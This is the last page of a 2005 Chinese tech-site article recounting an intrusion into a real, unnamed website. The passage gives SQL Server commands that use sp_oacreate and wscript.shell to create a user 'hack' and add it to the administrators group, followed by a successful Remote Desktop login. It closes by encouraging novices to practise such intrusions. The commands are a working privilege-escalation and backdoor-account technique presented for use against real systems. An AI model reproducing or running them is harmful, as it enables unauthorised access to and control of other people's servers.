多图详解:入侵国内某知名网站记录(6)

中华网科技 http://tech.china.com 2005-11-22 14:38:00

【进入BBS】【进入聊天室】【 推荐给朋友 】【浏览字号：大 中 小】【关闭窗口】

　　
　　OK，我们在“查询”中输入：
declare @cmd INT
exec sp_oacreate ‘wscript.shell‘,@cmd output
exec sp_oamethod @cmd,‘run‘,null,‘net user hack hack /add‘,‘0‘,‘true‘

declare @cmd INT
exec sp_oacreate ‘wscript.shell‘,@cmd output
exec sp_oamethod @cmd,‘run‘,null,‘net localgroup administrators hack /add‘,‘0‘,‘true‘

　　这个就是增加一个hack的用户密码也是hack，再提升为管理员权限，图20

提升管理权限
　　怎么样？是不是条条大路通罗马？

　　用增加的用户登陆3389看看（图21）

用3389端口，果然成功登陆了！！
　 四.小结

　　由于篇幅问题还有很多入侵的过程没有写出来，这里写的是主要的部分，文章读起来很简单，笔者在实际中可是遇到很多问题，想告诉广大菜鸟朋友：真正的技术是实践出来的不是看出来的。

首页 上页 | ...3| 4 | 5 | 6 | 下页 尾页  共 6 页